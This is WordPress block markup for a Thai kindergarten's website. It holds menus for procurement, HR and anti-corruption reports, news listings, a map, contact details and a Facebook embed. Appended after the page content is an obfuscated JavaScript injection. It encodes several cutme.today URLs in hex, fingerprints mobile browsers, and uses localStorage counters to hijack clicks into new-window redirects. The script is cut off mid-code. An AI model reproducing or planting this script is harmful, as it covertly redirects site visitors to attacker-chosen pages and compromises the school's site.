{\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 